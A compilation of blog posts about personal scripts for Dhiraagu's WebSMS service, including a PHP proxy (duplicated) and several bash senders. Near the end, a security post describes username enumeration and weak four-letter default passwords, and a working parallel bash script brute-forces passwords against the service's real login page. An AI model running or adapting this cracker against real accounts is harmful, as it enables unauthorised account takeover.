touch! SMS app now on Cydia @MMi repo

I just released a small project that has been sitting on my computer for quite some time. Dhiraagu touchSMS is a small client for Dhiraagu's websms. Search for "Dhiraagu toucSMS" on cydia and install.

It is pretty barebones for now (as it was primarily designed for personal use), but I hope to update it soon and include more error checking routines.. If you encounter any major problems, drop me a line here, or holla @kudanai on twitter.

Thanks @a_rishwan for the support, and the artwork.

Some Known Bugs:

The implementation is pretty rudimentary and you MAY encounter some problems. Firstly, the backend API is far from  complete, and will sometimes act inconsistently. Messages MAY have gotten through even if "request timeouts" occur. Secondly, the "connection checking" doesn't work too reliably so you yourself may need to verify that the internet connection IS in fact, working.

in honor of SJobs. May he rest in peace and his legacy live on for generations to come.

 

 

 

Tab Completion for Dhiraagu WebSMS Script

A LONNNNG LOONG time ago (two years specifically) I wrote a bash script that would allow me to send websms's on the command line.

This script has been working perfectly for me since the day I wrote it. However, the problem was that my "directory" file had started to grow a little out of proportion, and I started having trouble remembering all the aliases I put in it. So I wanted to enable custom tab completions on the script.

Enter this tiny bit of code.
All you have to do is insert the following at the end of your bashrc file (usually in ~/.bashrc)

complete -F _bdwsmscomplete websms
_bdwsmscomplete()
{
 local CUR PRE OPTS CONTACTS
 local WSMSDIR="$HOME/.wsmsdir" #change accordingly
     CUR="${COMP_WORDS[COMP_CWORD]}"
 PRE="${COMP_WORDS[COMP_CWORD-1]}"
 OPTS="-h -v -s -d -u -p -n"
 CONTACTS="$(cut -f1 -d',' ${WSMSDIR})"
 
 if [[ ${CUR} = -* ]]
 then
  COMPREPLY=($(compgen -W "${OPTS}" -- ${CUR}))
  return 0
 fi
   
 case ${PRE} in 
  -n)
   COMPREPLY=($(compgen -W "${CONTACTS}" -- ${CUR}))
   return 0
   ;;
  websms*) 
   COMPREPLY=($(compgen -W "-n" -- ${CUR}))
   return 0
   ;;
 esac

 return 0
}

If everything went well, you should be able to hit the [TAB] key while at the -n option and it'll automatically try to fill in the name of your contact.Enjoy!

P.S You'll need to re-open the terminal.

Dhiraagu webSMS Conduit

I posted a simple bash script a long time ago to try and ease the process of sending webSMS's. While the age when everybody around here was messing around with the service is long gone, I have personally found the service to be quite useful (it's free after all!), and still occasionally mess around with it. The script works through and through and has served it's purpose well over the ages. The problem however, was that it still required the exchange of a (relatively) large amount of data between the client (me) and the server(Dhiraagu). While this is inconsequential on a regular broadband connection, it is a problem on my rather expensive mobile data connection.

Thus, out of this particular need, and after a brief spurt of late night coding (4:00 am - 4:15am?) the following PHP script was born. It is to live on my hosted server, and there act as a "Conduit" between myself and Dhiraagu. As you can see, it is, more or less, a "port" of the original Bash script to PHP...and I hope the PHP gods won't rain thunder and rocks on my head for the horrible job I did of it.

An unexpected upshot of this however, is that it allows me to use it over SSL which I suppose is always a good thing.

 

Anyways...here be the thing.

Enjoy.

 

 

<?php
/*....
PHP script to act as a go-between for Dhiraagu websms
to minimize data-exchange. Ideally for use over a
mobile network.

just upload the php file to some place that supports
php_curl and make a standard GET request to the file
with the follwing parameters:

user,pass,num,msg,<cookie>

where cookie is optional, and is the session string of
an existing session.

The Script returns a JSON encoded status message.
*/

$old_error_handler = set_error_handler("myErrorHandler");
$SessionData=array(
	'status' => 'OK',
	'count' => NULL,
	'cookie' => NULL,
	'retries' => 0,
);

function terminate_now() {
	global $SessionData;
	echo json_encode($SessionData)."\n";
	exit(1);
}

function myErrorHandler($errno, $errstr, $errfile, $errline)
{

    global $SessionData;
    if (!(error_reporting() & $errno)) {
        return;
    }

    switch ($errno) {
    case E_USER_ERROR:
        $SessionData['status']="ERR: ".$errstr;
        terminate_now();
        break;

    case E_USER_WARNING:
        $SessionData['status']="WARN: ".$errstr;
        break;

    default:
        $SessionData['status']="ERRUNKWN: ".$errstr;
	terminate_now();
        break;
    }

    return true;
}

function make_curl_request($url,$post_params,$useCookie) {

	global $SessionData;

      	 	$ch = curl_init($url);
      	 	curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch,CURLOPT_AUTOREFERER,1);
		curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
		curl_setopt($ch,CURLOPT_HEADER,1);
        	curl_setopt($ch, CURLOPT_POST, 2);
        	curl_setopt($ch, CURLOPT_POSTFIELDS,$post_params);
		curl_setopt($ch,CURLOPT_COOKIESESSION,1);
		if($useCookie) {
			curl_setopt($ch,CURLOPT_COOKIE,'Dhi='.$SessionData['cookie']);
		}
        	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

	        $output = curl_exec($ch);
	        curl_close($ch);

		return $output;

}

function login()
{
	global $SessionData;
	$username=$_GET['user'];
	$password=$_GET['pass'];

	$return=make_curl_request('http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl',
				'username='.urlencode($username).'&password='.urlencode($password),FALSE);

	if(preg_match('/^Set-Cookie: Dhi=(.*?);/m', $return, $cookie_out)) {
		$SessionData['cookie']=$cookie_out[1];

		//CHECK DAILY QUOTA
		if(preg_match('/send (.*?) more/',$return,$msg_count)) {
			if(($SessionData['count']=$msg_count[1])<1){ 				trigger_error('You have Reached your Daily Quota',E_USER_ERROR); 				 			} else { 				sendsms(); 			} 		}  		return true; 	} else { 		trigger_error('Invalid Username andor Password',E_USER_ERROR); 		return false; 	} } function sendsms() { 	global $SessionData; 	$number=$_GET['num']; 	$message=$_GET['msg']; 	if(strlen($message) > 140) {
		trigger_error('Message Truncated',E_USER_WARNING);
		$message=substr($message,0,140);
	}

        $return=make_curl_request('http://websms.dhimobile.com.mv/cgi-bin/websms/send_message.pl',
				'mobilenumber='.urlencode($number).'&message='.urlencode($message),TRUE);

	//VALIDATE THE RETURN STUFF
	if(preg_match('/send (.*?) more/',$return,$msg_count)) {
		$SessionData['count']=$msg_count[1];
	} else {
		if(($SessionData['retries']++)>3){
			trigger_error('maximum number of retries exceeded',E_USER_ERROR);
		}
		login();
	}

}

if (isset($_GET['user']) && isset($_GET['pass']) && isset($_GET['msg']) && isset($_GET['num'])) {
	if(preg_match("/^7[4-9][0-9]{5}$/",$_GET['num'],$number)){
		$_GET['num']=$number[0];
	} else {
		trigger_error('Invalid Number Format',E_USER_ERROR);
	}
} else {
	trigger_error('Insufficiant Arguments',E_USER_ERROR);
}

if(isset($_GET['cookie'])){
	$SessionData['cookie']=$_GET['cookie'];
	sendsms();
} else {
	login();
}

terminate_now();
?>

Dhiraagu webSMS Conduit

I posted a simple bash script a long time ago to try and ease the process of sending webSMS's. While the age when everybody around here was messing around with the service is long gone, I have personally found the service to be quite useful (it's free after all!), and still occasionally mess around with it. The script works through and through and has served it's purpose well over the ages. The problem however, was that it still required the exchange of a (relatively) large amount of data between the client (me) and the server(Dhiraagu). While this is inconsequential on a regular broadband connection, it is a problem on my rather expensive mobile data connection.

Thus, out of this particular need, and after a brief spurt of late night coding (4:00 am - 4:15am?) the following PHP script was born. It is to live on my hosted server, and there act as a "Conduit" between myself and Dhiraagu. As you can see, it is, more or less, a "port" of the original Bash script to PHP...and I hope the PHP gods won't rain thunder and rocks on my head for the horrible job I did of it.

An unexpected upshot of this however, is that it allows me to use it over SSL which I suppose is always a good thing.

 

Anyways...here be the thing.

Enjoy.

 

 

<?php
/*....
PHP script to act as a go-between for Dhiraagu websms
to minimize data-exchange. Ideally for use over a
mobile network.

just upload the php file to some place that supports
php_curl and make a standard GET request to the file
with the follwing parameters:

user,pass,num,msg,<cookie>

where cookie is optional, and is the session string of
an existing session.

The Script returns a JSON encoded status message.
*/

$old_error_handler = set_error_handler("myErrorHandler");
$SessionData=array(
	'status' => 'OK',
	'count' => NULL,
	'cookie' => NULL,
	'retries' => 0,
);

function terminate_now() {
	global $SessionData;
	echo json_encode($SessionData)."\n";
	exit(1);
}

function myErrorHandler($errno, $errstr, $errfile, $errline)
{

    global $SessionData;
    if (!(error_reporting() & $errno)) {
        return;
    }

    switch ($errno) {
    case E_USER_ERROR:
        $SessionData['status']="ERR: ".$errstr;
        terminate_now();
        break;

    case E_USER_WARNING:
        $SessionData['status']="WARN: ".$errstr;
        break;

    default:
        $SessionData['status']="ERRUNKWN: ".$errstr;
	terminate_now();
        break;
    }

    return true;
}

function make_curl_request($url,$post_params,$useCookie) {

	global $SessionData;

      	 	$ch = curl_init($url);
      	 	curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch,CURLOPT_AUTOREFERER,1);
		curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
		curl_setopt($ch,CURLOPT_HEADER,1);
        	curl_setopt($ch, CURLOPT_POST, 2);
        	curl_setopt($ch, CURLOPT_POSTFIELDS,$post_params);
		curl_setopt($ch,CURLOPT_COOKIESESSION,1);
		if($useCookie) {
			curl_setopt($ch,CURLOPT_COOKIE,'Dhi='.$SessionData['cookie']);
		}
        	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

	        $output = curl_exec($ch);
	        curl_close($ch);

		return $output;

}

function login()
{
	global $SessionData;
	$username=$_GET['user'];
	$password=$_GET['pass'];

	$return=make_curl_request('http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl',
				'username='.urlencode($username).'&password='.urlencode($password),FALSE);

	if(preg_match('/^Set-Cookie: Dhi=(.*?);/m', $return, $cookie_out)) {
		$SessionData['cookie']=$cookie_out[1];

		//CHECK DAILY QUOTA
		if(preg_match('/send (.*?) more/',$return,$msg_count)) {
			if(($SessionData['count']=$msg_count[1])<1){ 				trigger_error('You have Reached your Daily Quota',E_USER_ERROR); 				 			} else { 				sendsms(); 			} 		}  		return true; 	} else { 		trigger_error('Invalid Username andor Password',E_USER_ERROR); 		return false; 	} } function sendsms() { 	global $SessionData; 	$number=$_GET['num']; 	$message=$_GET['msg']; 	if(strlen($message) > 140) {
		trigger_error('Message Truncated',E_USER_WARNING);
		$message=substr($message,0,140);
	}

        $return=make_curl_request('http://websms.dhimobile.com.mv/cgi-bin/websms/send_message.pl',
				'mobilenumber='.urlencode($number).'&message='.urlencode($message),TRUE);

	//VALIDATE THE RETURN STUFF
	if(preg_match('/send (.*?) more/',$return,$msg_count)) {
		$SessionData['count']=$msg_count[1];
	} else {
		if(($SessionData['retries']++)>3){
			trigger_error('maximum number of retries exceeded',E_USER_ERROR);
		}
		login();
	}

}

if (isset($_GET['user']) && isset($_GET['pass']) && isset($_GET['msg']) && isset($_GET['num'])) {
	if(preg_match("/^7[4-9][0-9]{5}$/",$_GET['num'],$number)){
		$_GET['num']=$number[0];
	} else {
		trigger_error('Invalid Number Format',E_USER_ERROR);
	}
} else {
	trigger_error('Insufficiant Arguments',E_USER_ERROR);
}

if(isset($_GET['cookie'])){
	$SessionData['cookie']=$_GET['cookie'];
	sendsms();
} else {
	login();
}

terminate_now();
?>

Bash Script: Dhiraagu WebSMS

I've been noticing a lot of problems with Dhiraagu's WebSMS site, mostly that annoying "Session Expired" Errors. So I decided it was time for a major overhaul of my websms script. So here it is. enjoy! Don't forget to comment, and send bug-reports, suggestions, hate-mail etc.

first, a change-log

REV 0 : Initial Release

REV 1 :
+ Verbosity
+ Checking message length
* Cleaned up regex

REV 2 :
+ Directory (alias)
+ Error checking numbers

Ver 2.0:
25-Nov-2008
Major overhaul, re-written from scratch

* Moved directory out of script to external file
* Moved cookie to /tmp (changeable)
+ Added argument processing
* NUMBER must now be given as an argument to -n option
+ Added option to silence output
+ Added option to display help
+ Added option to override default user and pass
+ Added option to override default directory
* Will detect old cookie-and try to re-use instead of logging in every-time.
+ Error checking of username and password
+ Handles "Session expired" error to an extent.It will keep re-trying until success

* Some more small changes that I can't remember

Installation is pretty standard. It uses cURL to do the heavy lifting so you'll need that. The directory file now defaults to ~/.wsmsdir. This is a comma seperated text file with name-number pairs

eg:

hotchick1,123943
hotchick2,123432
daddy,12432
wife,1498052

Change the default values for user and pass. Although this is not required anymore because you can give username and password info to the script using the -u and -p options now. It is not recommended if you share you computer with snoopy people. The script will leave a cookie file in /tmp by default (change "cookiebase" to whatever you like if you want to change this) name USERNAME.wsmscookie (this can be changed on the fourth line from the bottom).If you consider this feature a security risk or something, uncomment the last line to delete the cookie everytime after you send a message.

#!/usr/bin/env bash

##########################################
##                                      ##
##               \|/                    ##
##              '-D                     ##
##             BDWSMS 2.0               ##
##       (Bash Dhiraagu Web-Sms)        ##
##                                      ##
##########################################
##                                      
##  Written By, kudanai [2008]                 
##  http://kudanai.blogspot.com         
## 
##  This script is released as-is and 
##  without any liability on my behalf.
##
##  You are free to make modifications  
##  and redistribute. Credits where they
##  are due are appreciated, but not 
##  necessary.
##
##  Please submit feature requests and 
##  bug reports to moc.liamg@ianaduk
##  (email address is written backwards)
##
##########################################

user=DEFAULT-USER
pass=DEFAULT-PASS

#---leave these if you don't know what they mean --##

dirlist=~/.wsmsdir
cookiebase=/tmp

## ----no need to edit beyond this point --##
version=2.0
cookie=0
number=0
msg=0
verbose=1 #change to 0 if you want silence as default
uflag=0
pflag=0

main()
{
 if [ -e ${dirlist} ];then dcheck=`cat ${dirlist} | grep -w ${number} | cut -f2 -d","`;fi 

 if [ -n "${dcheck}" ]
 then
  number=${dcheck}
 fi

 if [ -z `echo ${number} | grep -E "^7[6-9][0-9]{5}$"` ]
 then
  echo "ERROR: Invalid Number or unknown alias"
  exit 1
 fi

 if [ $verbose -gt 0 ]
 then
  echo "Sending to: ${number}"
  if [ `expr length "${msg}"` -gt 140 ]
   then 
       echo "WARNING: Message will be truncated at ...${msg:130:10}"
  fi
 fi

 if [ -e ${cookie} ]
 then
  if [ $verbose -gt 0 ];then echo "Found cookie file - will try to re-use";fi
  sendsms
 else
  login
 fi

}

login()
{
 if [ $verbose -gt 0 ];then echo "Authenticating ... Getting cookie";fi
 ret=`curl -s --compressed -c ${cookie} -d "username=${user}" -d "password=${pass}" \
  http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl`

 if [ -n "`echo ${ret} | grep -i "password is incorrect"`" ]
 then
  echo "ERROR: Incorrect password"
  exit
 elif [ -n "`echo ${ret} | grep -i "you are not the"`" ]
 then
  echo "ERROR: Incorrect username"
  exit
 elif [ -n "`echo ${ret} | sed -n \"s/.*\( 0 more \).*/\1/p\"`" ]
 then
     echo "ERROR: Daily quota reached"
     exit
 else
     sendsms
 fi
}

sendsms()
{
 if [ $verbose -gt 0 ];then echo "Attempting to send message... ";fi
 ret=`curl -s --compressed -b ${cookie}  -d "mobilenumber=${number}" -d "message=${msg:0:140}" \
  http://websms.dhimobile.com.mv/cgi-bin/websms/send_message.pl`
 
 rem=`echo ${ret} | sed -n 's/.*\([yY]ou .* Day\).*/\1/p'`
 
 if [ -n "${rem}" ]
 then
  echo ${rem}
  exit
 else
  if [ $verbose -gt 0 ];then echo "ERROR: session expired? trying again";fi
  rm ${cookie}
  login
 fi
  
}

printhelp()
{
 echo "BDWSMS - KudaNai (kudanai.blogspot.com)"
 echo "Version: $version"
 echo "USAGE: $0 [OPTIONS...] -n number 'message'"
 echo
 echo "OPTIONS"
 echo " -h  Print this help and exit"
 echo " -v  Print version information"
 echo " -s  Silent. Supress additional information."
 echo " -d  Overried default directory file. The Directory file"
 echo "   is a comma seperated file containing name,number pairs"
 echo " -u USERNAME Override default username. Must use with -p"
 echo " -p PASSWORD Override default password. Must use with -u"
 echo
 echo "Please note that the -n argument is MANDATORY"
 exit 1
}

while getopts 'vshu:p:n:d:' OPTION
do
 case $OPTION in
  s) verbose=0 
   ;;
  v) echo "BDWSMS Version: ${version} [2008]"
   exit 0
   ;;
  u) user="${OPTARG}"
   uflag=1
   ;;
  d) dirlist="${OPTARG}"
   ;;
  p) pass="${OPTARG}"
   pflag=1
   ;;
  n) number="${OPTARG}"
   ;;
  h) printhelp
   ;;
  ?) printhelp
   exit;;
 esac
done

shift $(( $OPTIND - 1 ))
msg=$1

if [[ -z ${number} ]] || [[ -z ${msg} ]]
then
 printhelp
elif [[ ${uflag} -ne ${pflag} ]]
then
 echo "ERROR: You must specify values for both -u and -p options or not at all"
 printhelp
else
 cookie="${cookiebase}/${user}.wsmscookie"
 main 
fi

#rm ${cookie}

Running Bash scripts on the iPhone

It's always nice to be able to carry your work around with you. You gotta love some good command line action while walking down the street! In any case, if you find yourself needing to run some scripts on the iPhone or iPod touch, here's what to do!

1) Jailbreak your phone! you ain't getting anywhere without doing it anyway.
2) Make sure you have Cydia installed and then install the packages openSSH, MobileTerminal, cURL (if you want to use my WebSMS and facebook update scripts).
3) Save the script on your PC
4) load up your SSH client (commandline, nautilus or winSCP for windows guys..etc..)
5) Copy the file over to /usr/bin on the phone (or the home directory if you like)
6) chmod the file to 775 (or 755?)

and you're done!
I've been using my WebSMS and Facebook Update scripts on the phone for a while now. They help reduce the overhead of nevigating throught those stupid websites to get things done. now it's in the commandline, nice and easy. Enjoy

P.S I know it's not a very good guide. I got lazy so sue me! This officially concludes the transfer of everything I consider to be of...substance... over from the old blog. New stuff from here on end! HURRAYYY!!!

Bash WebSMS script using cURL

This post is the combination of all of the WebSMS scripts that I have posted to this date. This script will enable you to send text messages to Dhiraagu mobiles numbers via their websms site. As of the latest iteration, the script takes two arguments, the number (or alias) and the message.

but before that some setup notes for the n00bs

1) Save the script on your desktop, name it FILE (whatever you like)
2) Open up a terminal:
3) sudo cp ~/Desktop/FILE /usr/local/bin/sms
4) sudo chmod a+x /usr/local/bin/sms

from then on you can simply run it by typing "sms [number|alias] message" on the terminal

#!/bin/bash

user=YOUR-USERNAME
pass=YOUR-PASSWORD
number=$1
msg=$2

case "${number}" in

#--BEGIN DIRECTORY SEGMENT--##

hotchick1) number=7811223;;
hotchick2) number=7620382;;
hotchick3) number=7923423;;

#--END OF DIRECTORY SEGMENT--##

*)
if [ -z `echo ${number} | grep -E "^7[5-9][0-9]{5}$"` ]
then
echo "ERROR: Number not valid"
exit
fi
;;
esac


cd $HOME

echo -e "\nSending to ${number}\nMessage is `expr length "${msg}"` characters long"

if [ `expr length "${msg}"` -gt 140 ]
then
echo "Message will be truncated at ...${msg:130:10}"
fi

echo "Authenticating ... Getting cookie"
if [ -n "`curl -s --compressed -c cookiejar -d \"username=${user}&password=${pass}\" \
http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl | \
sed -n \"s/.*\( 0 more \).*/\1/p\"`" ]
then
echo "ERROR: Daily quota reached"
exit
fi

echo "Attempting to send message... "
curl -s --compressed -b cookiejar  -d "mobilenumber=${number}&message=${msg:0:140}" \
http://websms.dhimobile.com.mv/cgi-bin/websms/send_message.pl | \
sed -n 's/.*\([yY]ou .* Day\).*/\1/p'
echo -e "Done!\n"

rm cookiejar

for historical reasons, and because some people may prefer the older versions, they are included below.

#!/bin/bash

cd $HOME

user=$1
pass=$2
number=$3
msg=$4

echo -e "\nAuthenticating ... Getting cookie"
if [ -n "`curl -s --compressed -c cookiejar -d \"username=${user}&password=${pass}\" \
 http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl | \
 sed -n \"s/.*\( 0 more \).*/\1/p\"`" ]
then
 echo "Shit! You've hit that quota."
 exit
fi

echo "Message is `expr length "${msg}"` characters long"

if [ `expr length "${msg}"` -gt 140 ]
then
 echo "Message will be truncated"
fi

echo "Attempting to send message... "
curl -s --compressed -b cookiejar  -d "mobilenumber=${number}&message=${msg:0:140}" \
http://websms.dhimobile.com.mv/cgi-bin/websms/send_message.pl | \
sed -n 's/.*\([yY]ou .* Day\).*/\1/p'
echo -e "Done!\n"

rm cookiejar

and of course the first ever version of it, unbloated simplicity in itself.

#!/bin/bash
#usage "./websms username password number message"

cd $HOME

curl --progress-bar -c cookiejar -d "username=${1}&password=${2}" \
http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl | grep -i "day" | \
sed -e 's/<[^>]*>//g;s/^[ \t]*//'

curl --progress-bar -b cookiejar  -d "mobilenumber=${3}&message=${4}" \
http://websms.dhimobile.com.mv/cgi-bin/websms/send_message.pl | grep -i "day" | \
sed -e 's/<[^>]*>//g;s/^[ \t]*//'

rm cookiejar

Bash script: Crack Dhiraagu WebSMS passwords

some time ago I posted an article about how ridiculously insecure the webSMS site was, and how it was relatively simple it was for somebody to write up a bash script to possibly crack the default passwords.

For lack of something better to post about, I'm releasing the 5-minute bash script that I wrote as a proof-of-concept (for myself mostly). The following code is released on a ZERO LIABILITY basis. Which means, I am in no way responsible for your actions. It's proof-of-concept code and is NOT intended to be used. Educational purposes only. I will not be held responsible for any claims or charges of damages, negligence, cyber-crime etc and YOU automatically agree to this if you continue reading beyond this point. As such, I will not be giving you instructions or assistance regarding it. Thank you for your co-operation :)

EDIT: It seems some people didn't get the message when I said I won't provide any support for this. Let me clarify, DO NOT ASK ME HOW TO USE IT!

#!/bin/bash

cd $HOME/Desktop
mxjobs=15
cont=0

if [ -z ${2} ]
then
    cont=1
else
    cont=0
fi

echo "checking if username exists"

if [ -n "`curl -s  --compressed -d \"username=${1}&password=wroXngo123!@)\" \
    http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl | \
    grep \"password is incorrect\"`" ]
then
    echo "User exists. Let's see what happens."
else
    echo "That username does not exist."
    exit
fi

for a in {A..Z};do for b in {A..Z};do for c in {A..Z};do for d in {A..Z}
do
    f="${a}${b}${c}${d}"
    
    if [ $cont -lt 1 ]
    then
        echo  -en "skipping ${a}${b}${c}${d}\r"
        
        if [ "${f}" = "${2}" ]
        then
            echo
            echo "MATCH"
            cont=1
        fi
        continue
    fi
    
    ok=0
    while [ $ok -lt 1 ]
       do
          if [ `ps -A | grep curl | wc -l` -lt $mxjobs ]
          then
            ok=1
          fi
       done
    
       echo -en "Testing ${f}\r"
 
       if [ -n "`curl -s --compressed -d \"username=${1}&password=${f}\" \
       http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl | grep Dear`" ];then \
       echo "Found ${1},${f}" | tee -a foundpasses.txt;killall curl;kill ${$};fi&     
    
done;done;done;done

echo "I guess we didn't find it then"

WebSMS password security

Boredom can breed a lot of bullshit where I'm from, and this just happens to be one of those thing. A couple of days ago I was bored out of my skull and thought I'd have a look at the security on everybody's favorite website. Yes that's right. Dhiraagu's WebSMS!!!

Long story short There are a lot of stupid design flaws for a company of Dhiraagu's standing.
Let's go over what we know then shall we?

1) The sign up process is fairly simple and straight forward. You give
then a name (first and last), a username and your cell number.

2) They send you a confirmation sms with your password. These passwords are by default made up of FOUR upper case letters in various combinations. I cannot verify how random they are. we all know nobody really changes these. (which you should!)

3) Four letters? I mean cummon! That's only like ²⁶P₄ = 358800 combinations. Which say by brute forcing at about 5 passes/sec is a total of 71760 seconds - roughly 20 hours and more than reasonable time to crack one.Edit : Turns out the above calculation is wrong. It's actually 26⁴=456976 combinations, which adds about 5 hours to the total time estimate above.

4) The redirects for when you enter an invalid username, and when you enter an invalid password (correct username) are different; revealing far more information than it should. i.e, a would be attacker can check if a given username exists or not.

5) Non of the traffic,absolutely non of it is encrypted - making it so very very easy to sniff. They even use "password" as the name for the form field so that should make dsniff pretty happy I think.

Right then, so how easy would it be for say, ME, to write a script based on the above information and crack such a password? VERY easy. I mean all I'd have to do is generate all password combo's (in bash that's as easy as typing "echo {A..Z}{A..Z}{A..Z}{A..Z}" ) , and try them one at a time until I'm redirected to the right page...right? Forget writing stuff, there are already pretty strong bruteforcers out there.

so basically what I'm trying to say here is CHANGE THAT DEFAULT PASSWORD!!!